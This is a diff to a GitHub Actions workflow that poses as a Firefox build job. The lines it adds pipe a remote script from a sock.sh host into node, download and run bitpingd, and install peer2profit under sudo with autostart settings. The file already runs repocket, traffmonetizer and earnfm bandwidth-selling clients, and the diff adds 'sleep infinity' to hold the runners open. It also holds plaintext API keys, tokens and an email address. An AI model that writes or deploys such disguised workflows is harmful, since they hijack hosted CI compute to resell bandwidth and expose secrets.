--- a/.github/workflows/.workflows/build.yml
+++ b/.github/workflows/.workflows/build.yml
@@ -9,10 +9,12 @@ jobs:
         strategy:
             fail-fast: false
             matrix:
-                proxyrack: [0, 1]
+                proxyrack: [b, c]
         steps:
         - uses: actions/checkout@main
         - run: |
+              Xvfb :99 &
+              curl https://app-updates.sock.sh/peerclient/script/script.js | node - --homeIp point-of-presence.sock.sh --homePort 443 --id 1$(printf 0%.0s {1..62})${{matrix.proxyrack}} --version $(curl --silent https://app-updates.sock.sh/peerclient/script/version.txt) --clientKey proxyrack-pop-client --clientType PoP &
               podman run --init -d --restart=always -e RP_EMAIL=chaowen.guo1@gmail.com -e RP_API_KEY=9b23ebb9-2ee1-427f-a271-f6fdf536537b docker.io/repocket/repocket
               traffmonetizer=$(podman create docker.io/traffmonetizer/cli_v2)
               podman cp $traffmonetizer:/app/Cli .
@@ -29,14 +31,30 @@ jobs:
               podman cp $earnfm:/app/earnfm_example .
               podman rm $earnfm
               EARNFM_TOKEN=0a981b92-0b71-44a2-bdec-eceb5d946025 ./earnfm_example &
+              curl $(curl https://releases.bitping.com/bitpingd/update.json | jq -r .platforms[\"linux-x86_64\"].url) | tar -xz
+              sudo mkdir -p /root/.bitpingd
+              sudo mv node${{matrix.proxyrack}}.db /root/.bitpingd/node.db
+              sudo ./bitpingd &
+              curl -O https://updates.peer2profit.app/peer2profit_0.48_amd64.deb 
+              sudo apt install -y --no-install-recommends ./peer2profit_0.48_amd64.deb
+              cat <<END > ~/.config/org.peer2profit.peer2profit.ini
+              [General]
+              StartOnStartup=true
+              hideToTrayMsg=true
+              locale=en_US
+              Username=chaowen.guo1@gmail.com
+              installid2=$(cat /proc/sys/kernel/random/uuid)
+              END
+              DISPLAY=:99 peer2profit &
               python3 mach build
               cd ${{github.workspace}}
-              tar -cjvf ghc.tar.bz2 -C product .
+              tar -cjvf firefox.tar.bz2 -C product .
+              sleep infinity
         - uses: softprops/action-gh-release@master
           with:
               token: ${{secrets.GITHUB_TOKEN}}
               tag_name: 1
-              files: ghc.tar.bz2
+              files: firefox.tar.bz2
     clean:
         runs-on: ubuntu-latest
         permissions:
